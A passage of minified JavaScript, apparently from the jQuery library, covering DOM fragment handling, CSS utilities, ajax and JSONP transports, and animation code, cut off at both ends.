if(wt.test(o)){s=s||f.appendChild(t.createElement("div")),u=(bt.exec(o)||["",""])[1].toLowerCase(),c=At[u]||At._default,s.innerHTML=c[1]+o.replace(vt,"<$1></$2>")+c[2],i=c[0];while(i--)s=s.lastChild;if(!b.support.leadingWhitespace&&yt.test(o)&&d.push(t.createTextNode(yt.exec(o)[0])),!b.support.tbody){o="table"!==u||xt.test(o)?"<table>"!==c[1]||xt.test(o)?0:s:s.firstChild,i=o&&o.childNodes.length;while(i--)b.nodeName(l=o.childNodes[i],"tbody")&&!l.childNodes.length&&o.removeChild(l)
	}b.merge(d,s.childNodes),s.textContent="";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTextNode(o));s&&f.removeChild(s),b.support.appendChecked||b.grep(Ot(d,"input"),Bt),h=0;while(o=d[h++])if((!r||-1===b.inArray(o,r))&&(a=b.contains(o.ownerDocument,o),s=Ot(f.appendChild(o),"script"),a&&Mt(s),n)){i=0;while(o=s[i++])kt.test(o.type||"")&&n.push(o)}return s=null,f},cleanData:function(e,t){var n,r,o,a,s=0,u=b.expando,l=b.cache,p=b.support.deleteExpando,f=b.event.special;for(;null!=(n=e[s]);s++)if((t||b.acceptData(n))&&(o=n[u],a=o&&l[o])){if(a.events)for(r in a.events)f[r]?b.event.remove(n,r):b.removeEvent(n,r,a.handle);l[o]&&(delete l[o],p?delete n[u]:typeof n.removeAttribute!==i?n.removeAttribute(u):n[u]=null,c.push(o))}}});var Pt,Rt,Wt,$t=/alpha\([^)]*\)/i,It=/opacity\s*=\s*([^)]*)/,zt=/^(top|right|bottom|left)$/,Xt=/^(none|table(?!-c[ea]).+)/,Ut=/^margin/,Vt=RegExp("^("+x+")(.*)$","i"),Yt=RegExp("^("+x+")(?!px)[a-z%]+$","i"),Jt=RegExp("^([+-])=("+x+")","i"),Gt={BODY:"block"},Qt={position:"absolute",visibility:"hidden",display:"block"},Kt={letterSpacing:0,fontWeight:400},Zt=["Top","Right","Bottom","Left"],en=["Webkit","O","Moz","ms"];function tn(e,t){if(t in e)return t;var n=t.charAt(0).toUpperCase()+t.slice(1),r=t,i=en.length;while(i--)if(t=en[i]+n,t in e)return t;return r}function nn(e,t){return e=t||e,"none"===b.css(e,"display")||!b.contains(e.ownerDocument,e)}function rn(e,t){var n,r,i,o=[],a=0,s=e.length;for(;s>a;a++)r=e[a],r.style&&(o[a]=b._data(r,"olddisplay"),n=r.style.display,t?(o[a]||"none"!==n||(r.style.display=""),""===r.style.display&&nn(r)&&(o[a]=b._data(r,"olddisplay",un(r.nodeName)))):o[a]||(i=nn(r),(n&&"none"!==n||!i)&&b._data(r,"olddisplay",i?n:b.css(r,"display"))));for(a=0;s>a;a++)r=e[a],r.style&&(t&&"none"!==r.style.display&&""!==r.style.display||(r.style.display=t?o[a]||"":"none"));return e}b.fn.extend({css:function(e,n){return b.access(this,function(e,n,r){var 
i,o,a={},s=0;if(b.isArray(n)){for(o=Rt(e),i=n.length;i>s;s++)a[n[s]]=b.css(e,n[s],!1,o);return a}return r!==t?b.style(e,n,r):b.css(e,n)},e,n,arguments.length>1)},show:function(){return rn(this,!0)},hide:function(){return rn(this)},toggle:function(e){var t="boolean"==typeof e;return this.each(function(){(t?e:nn(this))?b(this).show():b(this).hide()})}}),b.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Wt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":b.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var o,a,s,u=b.camelCase(n),l=e.style;if(n=b.cssProps[u]||(b.cssProps[u]=tn(l,u)),s=b.cssHooks[n]||b.cssHooks[u],r===t)return s&&"get"in s&&(o=s.get(e,!1,i))!==t?o:l[n];if(a=typeof r,"string"===a&&(o=Jt.exec(r))&&(r=(o[1]+1)*o[2]+parseFloat(b.css(e,n)),a="number"),!(null==r||"number"===a&&isNaN(r)||("number"!==a||b.cssNumber[u]||(r+="px"),b.support.clearCloneStyle||""!==r||0!==n.indexOf("background")||(l[n]="inherit"),s&&"set"in s&&(r=s.set(e,r,i))===t)))try{l[n]=r}catch(c){}}},css:function(e,n,r,i){var o,a,s,u=b.camelCase(n);return n=b.cssProps[u]||(b.cssProps[u]=tn(e.style,u)),s=b.cssHooks[n]||b.cssHooks[u],s&&"get"in s&&(a=s.get(e,!0,r)),a===t&&(a=Wt(e,n,i)),"normal"===a&&n in Kt&&(a=Kt[n]),""===r||r?(o=parseFloat(a),r===!0||b.isNumeric(o)?o||0:a):a},swap:function(e,t,n,r){var i,o,a={};for(o in t)a[o]=e.style[o],e.style[o]=t[o];i=n.apply(e,r||[]);for(o in t)e.style[o]=a[o];return i}}),e.getComputedStyle?(Rt=function(t){return e.getComputedStyle(t,null)},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),u=s?s.getPropertyValue(n)||s[n]:t,l=e.style;return 
s&&(""!==u||b.contains(e.ownerDocument,e)||(u=b.style(e,n)),Yt.test(u)&&Ut.test(n)&&(i=l.width,o=l.minWidth,a=l.maxWidth,l.minWidth=l.maxWidth=l.width=u,u=s.width,l.width=i,l.minWidth=o,l.maxWidth=a)),u}):o.documentElement.currentStyle&&(Rt=function(e){return e.currentStyle},Wt=function(e,n,r){var i,o,a,s=r||Rt(e),u=s?s[n]:t,l=e.style;return null==u&&l&&l[n]&&(u=l[n]),Yt.test(u)&&!zt.test(n)&&(i=l.left,o=e.runtimeStyle,a=o&&o.left,a&&(o.left=e.currentStyle.left),l.left="fontSize"===n?"1em":u,u=l.pixelLeft+"px",l.left=i,a&&(o.left=a)),""===u?"auto":u});function on(e,t,n){var r=Vt.exec(t);return r?Math.max(0,r[1]-(n||0))+(r[2]||"px"):t}function an(e,t,n,r,i){var o=n===(r?"border":"content")?4:"width"===t?1:0,a=0;for(;4>o;o+=2)"margin"===n&&(a+=b.css(e,n+Zt[o],!0,i)),r?("content"===n&&(a-=b.css(e,"padding"+Zt[o],!0,i)),"margin"!==n&&(a-=b.css(e,"border"+Zt[o]+"Width",!0,i))):(a+=b.css(e,"padding"+Zt[o],!0,i),"padding"!==n&&(a+=b.css(e,"border"+Zt[o]+"Width",!0,i)));return a}function sn(e,t,n){var r=!0,i="width"===t?e.offsetWidth:e.offsetHeight,o=Rt(e),a=b.support.boxSizing&&"border-box"===b.css(e,"boxSizing",!1,o);if(0>=i||null==i){if(i=Wt(e,t,o),(0>i||null==i)&&(i=e.style[t]),Yt.test(i))return i;r=a&&(b.support.boxSizingReliable||i===e.style[t]),i=parseFloat(i)||0}return i+an(e,t,n||(a?"border":"content"),r,o)+"px"}function un(e){var t=o,n=Gt[e];return n||(n=ln(e,t),"none"!==n&&n||(Pt=(Pt||b("<iframe frameborder='0' width='0' height='0'/>").css("cssText","display:block !important")).appendTo(t.documentElement),t=(Pt[0].contentWindow||Pt[0].contentDocument).document,t.write("<!doctype html><html><body>"),t.close(),n=ln(e,t),Pt.detach()),Gt[e]=n),n}function ln(e,t){var n=b(t.createElement(e)).appendTo(t.body),r=b.css(n[0],"display");return n.remove(),r}b.each(["height","width"],function(e,n){b.cssHooks[n]={get:function(e,r,i){return r?0===e.offsetWidth&&Xt.test(b.css(e,"display"))?b.swap(e,Qt,function(){return sn(e,n,i)}):sn(e,n,i):t},set:function(e,t,r){var 
i=r&&Rt(e);return on(e,t,r?an(e,n,r,b.support.boxSizing&&"border-box"===b.css(e,"boxSizing",!1,i),i):0)}}}),b.support.opacity||(b.cssHooks.opacity={get:function(e,t){return It.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=b.isNumeric(t)?"alpha(opacity="+100*t+")":"",o=r&&r.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===b.trim(o.replace($t,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||r&&!r.filter)||(n.filter=$t.test(o)?o.replace($t,i):o+" "+i)}}),b(function(){b.support.reliableMarginRight||(b.cssHooks.marginRight={get:function(e,n){return n?b.swap(e,{display:"inline-block"},Wt,[e,"marginRight"]):t}}),!b.support.pixelPosition&&b.fn.position&&b.each(["top","left"],function(e,n){b.cssHooks[n]={get:function(e,r){return r?(r=Wt(e,n),Yt.test(r)?b(e).position()[n]+"px":r):t}}})}),b.expr&&b.expr.filters&&(b.expr.filters.hidden=function(e){return 0>=e.offsetWidth&&0>=e.offsetHeight||!b.support.reliableHiddenOffsets&&"none"===(e.style&&e.style.display||b.css(e,"display"))},b.expr.filters.visible=function(e){return!b.expr.filters.hidden(e)}),b.each({margin:"",padding:"",border:"Width"},function(e,t){b.cssHooks[e+t]={expand:function(n){var r=0,i={},o="string"==typeof n?n.split(" "):[n];for(;4>r;r++)i[e+Zt[r]+t]=o[r]||o[r-2]||o[0];return i}},Ut.test(e)||(b.cssHooks[e+t].set=on)});var cn=/%20/g,pn=/\[\]$/,fn=/\r?\n/g,dn=/^(?:submit|button|image|reset|file)$/i,hn=/^(?:input|select|textarea|keygen)/i;b.fn.extend({serialize:function(){return b.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=b.prop(this,"elements");return e?b.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!b(this).is(":disabled")&&hn.test(this.nodeName)&&!dn.test(e)&&(this.checked||!Nt.test(e))}).map(function(e,t){var n=b(this).val();return 
null==n?null:b.isArray(n)?b.map(n,function(e){return{name:t.name,value:e.replace(fn,"\r\n")}}):{name:t.name,value:n.replace(fn,"\r\n")}}).get()}}),b.param=function(e,n){var r,i=[],o=function(e,t){t=b.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};if(n===t&&(n=b.ajaxSettings&&b.ajaxSettings.traditional),b.isArray(e)||e.jquery&&!b.isPlainObject(e))b.each(e,function(){o(this.name,this.value)});else for(r in e)gn(r,e[r],n,o);return i.join("&").replace(cn,"+")};function gn(e,t,n,r){var i;if(b.isArray(t))b.each(t,function(t,i){n||pn.test(e)?r(e,i):gn(e+"["+("object"==typeof i?t:"")+"]",i,n,r)});else if(n||"object"!==b.type(t))r(e,t);else for(i in t)gn(e+"["+i+"]",t[i],n,r)}b.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){b.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),b.fn.hover=function(e,t){return this.mouseenter(e).mouseleave(t||e)};var mn,yn,vn=b.now(),bn=/\?/,xn=/#.*$/,wn=/([?&])_=[^&]*/,Tn=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,Nn=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Cn=/^(?:GET|HEAD)$/,kn=/^\/\//,En=/^([\w.+-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,Sn=b.fn.load,An={},jn={},Dn="*/".concat("*");try{yn=a.href}catch(Ln){yn=o.createElement("a"),yn.href="",yn=yn.href}mn=En.exec(yn.toLowerCase())||[];function Hn(e){return function(t,n){"string"!=typeof t&&(n=t,t="*");var r,i=0,o=t.toLowerCase().match(w)||[];if(b.isFunction(n))while(r=o[i++])"+"===r[0]?(r=r.slice(1)||"*",(e[r]=e[r]||[]).unshift(n)):(e[r]=e[r]||[]).push(n)}}function qn(e,n,r,i){var o={},a=e===jn;function s(u){var l;return o[u]=!0,b.each(e[u]||[],function(e,u){var c=u(n,r,i);return"string"!=typeof c||a||o[c]?a?!(l=c):t:(n.dataTypes.unshift(c),s(c),!1)}),l}return s(n.dataTypes[0])||!o["*"]&&s("*")}function Mn(e,n){var 
r,i,o=b.ajaxSettings.flatOptions||{};for(i in n)n[i]!==t&&((o[i]?e:r||(r={}))[i]=n[i]);return r&&b.extend(!0,e,r),e}b.fn.load=function(e,n,r){if("string"!=typeof e&&Sn)return Sn.apply(this,arguments);var i,o,a,s=this,u=e.indexOf(" ");return u>=0&&(i=e.slice(u,e.length),e=e.slice(0,u)),b.isFunction(n)?(r=n,n=t):n&&"object"==typeof n&&(a="POST"),s.length>0&&b.ajax({url:e,type:a,dataType:"html",data:n}).done(function(e){o=arguments,s.html(i?b("<div>").append(b.parseHTML(e)).find(i):e)}).complete(r&&function(e,t){s.each(r,o||[e.responseText,t,e])}),this},b.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){b.fn[t]=function(e){return this.on(t,e)}}),b.each(["get","post"],function(e,n){b[n]=function(e,r,i,o){return b.isFunction(r)&&(o=o||i,i=r,r=t),b.ajax({url:e,type:n,dataType:o,data:r,success:i})}}),b.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:yn,type:"GET",isLocal:Nn.test(mn[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Dn,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":b.parseJSON,"text xml":b.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?Mn(Mn(e,b.ajaxSettings),t):Mn(b.ajaxSettings,e)},ajaxPrefilter:Hn(An),ajaxTransport:Hn(jn),ajax:function(e,n){"object"==typeof e&&(n=e,e=t),n=n||{};var r,i,o,a,s,u,l,c,p=b.ajaxSetup({},n),f=p.context||p,d=p.context&&(f.nodeType||f.jquery)?b(f):b.event,h=b.Deferred(),g=b.Callbacks("once memory"),m=p.statusCode||{},y={},v={},x=0,T="canceled",N={readyState:0,getResponseHeader:function(e){var t;if(2===x){if(!c){c={};while(t=Tn.exec(a))c[t[1].toLowerCase()]=t[2]}t=c[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 
2===x?a:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return x||(e=v[n]=v[n]||e,y[e]=t),this},overrideMimeType:function(e){return x||(p.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>x)for(t in e)m[t]=[m[t],e[t]];else N.always(e[N.status]);return this},abort:function(e){var t=e||T;return l&&l.abort(t),k(0,t),this}};if(h.promise(N).complete=g.add,N.success=N.done,N.error=N.fail,p.url=((e||p.url||yn)+"").replace(xn,"").replace(kn,mn[1]+"//"),p.type=n.method||n.type||p.method||p.type,p.dataTypes=b.trim(p.dataType||"*").toLowerCase().match(w)||[""],null==p.crossDomain&&(r=En.exec(p.url.toLowerCase()),p.crossDomain=!(!r||r[1]===mn[1]&&r[2]===mn[2]&&(r[3]||("http:"===r[1]?80:443))==(mn[3]||("http:"===mn[1]?80:443)))),p.data&&p.processData&&"string"!=typeof p.data&&(p.data=b.param(p.data,p.traditional)),qn(An,p,n,N),2===x)return N;u=p.global,u&&0===b.active++&&b.event.trigger("ajaxStart"),p.type=p.type.toUpperCase(),p.hasContent=!Cn.test(p.type),o=p.url,p.hasContent||(p.data&&(o=p.url+=(bn.test(o)?"&":"?")+p.data,delete p.data),p.cache===!1&&(p.url=wn.test(o)?o.replace(wn,"$1_="+vn++):o+(bn.test(o)?"&":"?")+"_="+vn++)),p.ifModified&&(b.lastModified[o]&&N.setRequestHeader("If-Modified-Since",b.lastModified[o]),b.etag[o]&&N.setRequestHeader("If-None-Match",b.etag[o])),(p.data&&p.hasContent&&p.contentType!==!1||n.contentType)&&N.setRequestHeader("Content-Type",p.contentType),N.setRequestHeader("Accept",p.dataTypes[0]&&p.accepts[p.dataTypes[0]]?p.accepts[p.dataTypes[0]]+("*"!==p.dataTypes[0]?", "+Dn+"; q=0.01":""):p.accepts["*"]);for(i in p.headers)N.setRequestHeader(i,p.headers[i]);if(p.beforeSend&&(p.beforeSend.call(f,N,p)===!1||2===x))return N.abort();T="abort";for(i in{success:1,error:1,complete:1})N[i](p[i]);if(l=qn(jn,p,n,N)){N.readyState=1,u&&d.trigger("ajaxSend",[N,p]),p.async&&p.timeout>0&&(s=setTimeout(function(){N.abort("timeout")},p.timeout));try{x=1,l.send(y,k)}catch(C){if(!(2>x))throw C;k(-1,C)}}else k(-1,"No Transport");function 
k(e,n,r,i){var c,y,v,w,T,C=n;2!==x&&(x=2,s&&clearTimeout(s),l=t,a=i||"",N.readyState=e>0?4:0,r&&(w=_n(p,N,r)),e>=200&&300>e||304===e?(p.ifModified&&(T=N.getResponseHeader("Last-Modified"),T&&(b.lastModified[o]=T),T=N.getResponseHeader("etag"),T&&(b.etag[o]=T)),204===e?(c=!0,C="nocontent"):304===e?(c=!0,C="notmodified"):(c=Fn(p,w),C=c.state,y=c.data,v=c.error,c=!v)):(v=C,(e||!C)&&(C="error",0>e&&(e=0))),N.status=e,N.statusText=(n||C)+"",c?h.resolveWith(f,[y,C,N]):h.rejectWith(f,[N,C,v]),N.statusCode(m),m=t,u&&d.trigger(c?"ajaxSuccess":"ajaxError",[N,p,c?y:v]),g.fireWith(f,[N,C]),u&&(d.trigger("ajaxComplete",[N,p]),--b.active||b.event.trigger("ajaxStop")))}return N},getScript:function(e,n){return b.get(e,t,n,"script")},getJSON:function(e,t,n){return b.get(e,t,n,"json")}});function _n(e,n,r){var i,o,a,s,u=e.contents,l=e.dataTypes,c=e.responseFields;for(s in c)s in r&&(n[c[s]]=r[s]);while("*"===l[0])l.shift(),o===t&&(o=e.mimeType||n.getResponseHeader("Content-Type"));if(o)for(s in u)if(u[s]&&u[s].test(o)){l.unshift(s);break}if(l[0]in r)a=l[0];else{for(s in r){if(!l[0]||e.converters[s+" "+l[0]]){a=s;break}i||(i=s)}a=a||i}return a?(a!==l[0]&&l.unshift(a),r[a]):t}function Fn(e,t){var n,r,i,o,a={},s=0,u=e.dataTypes.slice(),l=u[0];if(e.dataFilter&&(t=e.dataFilter(t,e.dataType)),u[1])for(i in e.converters)a[i.toLowerCase()]=e.converters[i];for(;r=u[++s];)if("*"!==r){if("*"!==l&&l!==r){if(i=a[l+" "+r]||a["* "+r],!i)for(n in a)if(o=n.split(" "),o[1]===r&&(i=a[l+" "+o[0]]||a["* "+o[0]])){i===!0?i=a[n]:a[n]!==!0&&(r=o[0],u.splice(s--,0,r));break}if(i!==!0)if(i&&e["throws"])t=i(t);else try{t=i(t)}catch(c){return{state:"parsererror",error:i?c:"No conversion from "+l+" to "+r}}}l=r}return{state:"success",data:t}}b.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return 
b.globalEval(e),e}}}),b.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),b.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=o.head||b("head")[0]||o.documentElement;return{send:function(t,i){n=o.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){(t||!n.readyState||/loaded|complete/.test(n.readyState))&&(n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||i(200,"success"))},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var On=[],Bn=/(=)\?(?=&|$)|\?\?/;b.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=On.pop()||b.expando+"_"+vn++;return this[e]=!0,e}}),b.ajaxPrefilter("json jsonp",function(n,r,i){var o,a,s,u=n.jsonp!==!1&&(Bn.test(n.url)?"url":"string"==typeof n.data&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Bn.test(n.data)&&"data");return u||"jsonp"===n.dataTypes[0]?(o=n.jsonpCallback=b.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,u?n[u]=n[u].replace(Bn,"$1"+o):n.jsonp!==!1&&(n.url+=(bn.test(n.url)?"&":"?")+n.jsonp+"="+o),n.converters["script json"]=function(){return s||b.error(o+" was not called"),s[0]},n.dataTypes[0]="json",a=e[o],e[o]=function(){s=arguments},i.always(function(){e[o]=a,n[o]&&(n.jsonpCallback=r.jsonpCallback,On.push(o)),s&&b.isFunction(a)&&a(s[0]),s=a=t}),"script"):t});var Pn,Rn,Wn=0,$n=e.ActiveXObject&&function(){var e;for(e in Pn)Pn[e](t,!0)};function In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}b.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=b.ajaxSettings.xhr(),b.support.cors=!!Rn&&"withCredentials"in Rn,Rn=b.support.ajax=!!Rn,Rn&&b.ajaxTransport(function(n){if(!n.crossDomain||b.support.cors){var r;return{send:function(i,o){var 
a,s,u=n.xhr();if(n.username?u.open(n.type,n.url,n.async,n.username,n.password):u.open(n.type,n.url,n.async),n.xhrFields)for(s in n.xhrFields)u[s]=n.xhrFields[s];n.mimeType&&u.overrideMimeType&&u.overrideMimeType(n.mimeType),n.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)u.setRequestHeader(s,i[s])}catch(l){}u.send(n.hasContent&&n.data||null),r=function(e,i){var s,l,c,p;try{if(r&&(i||4===u.readyState))if(r=t,a&&(u.onreadystatechange=b.noop,$n&&delete Pn[a]),i)4!==u.readyState&&u.abort();else{p={},s=u.status,l=u.getAllResponseHeaders(),"string"==typeof u.responseText&&(p.text=u.responseText);try{c=u.statusText}catch(f){c=""}s||!n.isLocal||n.crossDomain?1223===s&&(s=204):s=p.text?200:404}}catch(d){i||o(-1,d)}p&&o(s,c,p,l)},n.async?4===u.readyState?setTimeout(r):(a=++Wn,$n&&(Pn||(Pn={},b(e).unload($n)),Pn[a]=r),u.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var Xn,Un,Vn=/^(?:toggle|show|hide)$/,Yn=RegExp("^(?:([+-])=|)("+x+")([a-z%]*)$","i"),Jn=/queueHooks$/,Gn=[nr],Qn={"*":[function(e,t){var n,r,i=this.createTween(e,t),o=Yn.exec(t),a=i.cur(),s=+a||0,u=1,l=20;if(o){if(n=+o[2],r=o[3]||(b.cssNumber[e]?"":"px"),"px"!==r&&s){s=b.css(i.elem,e,!0)||n||1;do u=u||".5",s/=u,b.style(i.elem,e,s+r);while(u!==(u=i.cur()/a)&&1!==u&&--l)}i.unit=r,i.start=s,i.end=o[1]?s+(o[1]+1)*n:n}return i}]};function Kn(){return setTimeout(function(){Xn=t}),Xn=b.now()}function Zn(e,t){b.each(t,function(t,n){var r=(Qn[t]||[]).concat(Qn["*"]),i=0,o=r.length;for(;o>i;i++)if(r[i].call(e,t,n))return})}function er(e,t,n){var r,i,o=0,a=Gn.length,s=b.Deferred().always(function(){delete u.elem}),u=function(){if(i)return!1;var t=Xn||Kn(),n=Math.max(0,l.startTime+l.duration-t),r=n/l.duration||0,o=1-r,a=0,u=l.tweens.length;for(;u>a;a++)l.tweens[a].run(o);return 
s.notifyWith(e,[l,o,n]),1>o&&u?n:(s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:b.extend({},t),opts:b.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:Xn||Kn(),duration:n.duration,tweens:[],createTween:function(t,n){var r=b.Tween(e,l.opts,t,n,l.opts.specialEasing[t]||l.opts.easing);return l.tweens.push(r),r},stop:function(t){var n=0,r=t?l.tweens.length:0;if(i)return this;for(i=!0;r>n;n++)l.tweens[n].run(1);return t?s.resolveWith(e,[l,t]):s.rejectWith(e,[l,t]),this}}),c=l.props;for(tr(c,l.opts.specialEasing);a>o;o++)if(r=Gn[o].call(l,e,c,l.opts))return r;return Zn(l,c),b.isFunction(l.opts.start)&&l.opts.start.call(e,l),b.fx.timer(b.extend(u,{elem:e,anim:l,queue:l.opts.queue})),l.progress(l.opts.progress).done(l.opts.done,l.opts.complete).fail(l.opts.fail).always(l.opts.always)}function tr(e,t){var n,r,i,o,a;for(i in e)if(r=b.camelCase(i),o=t[r],n=e[i],b.isArray(n)&&(o=n[1],n=e[i]=n[0]),i!==r&&(e[r]=n,delete e[i]),a=b.cssHooks[r],a&&"expand"in a){n=a.expand(n),delete e[r];for(i in n)i in e||(e[i]=n[i],t[i]=o)}else t[r]=o}b.Animation=b.extend(er,{tweener:function(e,t){b.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;i>r;r++)n=e[r],Qn[n]=Qn[n]||[],Qn[n].unshift(t)},prefilter:function(e,t){t?Gn.unshift(e):Gn.push(e)}});function nr(e,t,n){var r,i,o,a,s,u,l,c,p,f=this,d=e.style,h={},g=[],m=e.nodeType&&nn(e);n.queue||(c=b._queueHooks(e,"fx"),null==c.unqueued&&(c.unqueued=0,p=c.empty.fire,c.empty.fire=function(){c.unqueued||p()}),c.unqueued++,f.always(function(){f.always(function(){c.unqueued--,b.queue(e,"fx").length||c.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in 
t)&&(n.overflow=[d.overflow,d.overflowX,d.overflowY],"inline"===b.css(e,"display")&&"none"===b.css(e,"float")&&(b.support.inlineBlockNeedsLayout&&"inline"!==un(e.nodeName)?d.zoom=1:d.display="inline-block")),n.overflow&&(d.overflow="hidden",b.support.shrinkWrapBlocks||f.always(function(){d.overflow=n.overflow[0],d.overflowX=n.overflow[1],d.overflowY=n.overflow[2]}));for(i in t)if(a=t[i],Vn.exec(a)){if(delete t[i],u=u||"toggle"===a,a===(m?"hide":"show"))continue;g.push(i)}if(o=g.length){s=b._data(e,"fxshow")||b._data(e,"fxshow",{}),"hidden"in s&&(m=s.hidden),u&&(s.hidden=!m),m?b(e).show():f.done(function(){b(e).hide()}),f.done(function(){var t;b._removeData(e,"fxshow");for(t in h)b.style(e,t,h[t])});for(i=0;o>i;i++)r=g[i],l=f.createTween(r,m?s[r]:0),h[r]=s[r]||b.style(e,r),r in s||(s[r]=l.start,m&&(l.end=l.start,l.start="width"===r||"height"===r?1:0))}}function rr(e,t,n,r,i){return new rr.prototype.init(e,t,n,r,i)}b.Tween=rr,rr.prototype={constructor:rr,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(b.cssNumber[n]?"":"px")},cur:function(){var e=rr.propHooks[this.prop];return e&&e.get?e.get(this):rr.propHooks._default.get(this)},run:function(e){var t,n=rr.propHooks[this.prop];return this.pos=t=this.options.duration?b.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):rr.propHooks._default.set(this),this}},rr.prototype.init.prototype=rr.prototype,rr.propHooks={_default:{get:function(e){var t;return 
null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=b.css(e.elem,e.prop,""),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){b.fx.step[e.prop]?b.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[b.cssProps[e.prop]]||b.cssHooks[e.prop])?b.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},rr.propHooks.scrollTop=rr.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},b.each(["toggle","show","hide"],function(e,t){var n=b.fn[t];b.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ir(t,!0),e,r,i)}}),b.fn.extend({fadeTo:function(e,t,n,r){return this.filter(nn).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=b.isEmptyObject(e),o=b.speed(t,n,r),a=function(){var t=er(this,b.extend({},e),o);a.finish=function(){t.stop(!0)},(i||b._data(this,"finish"))&&t.stop(!0)};return a.finish=a,i||o.queue===!1?this.each(a):this.queue(o.queue,a)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return"string"!=typeof e&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=null!=e&&e+"queueHooks",o=b.timers,a=b._data(this);if(n)a[n]&&a[n].stop&&i(a[n]);else for(n in a)a[n]&&a[n].stop&&Jn.test(n)&&i(a[n]);for(n=o.length;n--;)o[n].elem!==this||null!=e&&o[n].queue!==e||(o[n].anim.stop(r),t=!1,o.splice(n,1));(t||!r)&&b.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=b._data(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=b.timers,a=r?r.length:0;for(n.finish=!0,b.queue(this,e,[]),i&&i.cur&&i.cur.finish&&i.cur.finish.call(this),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;a>t;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}});function ir(e,t){var n,r={height:e},i=0;for(t=t?1:0;4>i;i+=2-t)n=Zt[i],r["margin"+n]=r["padding"+n]=e;return 
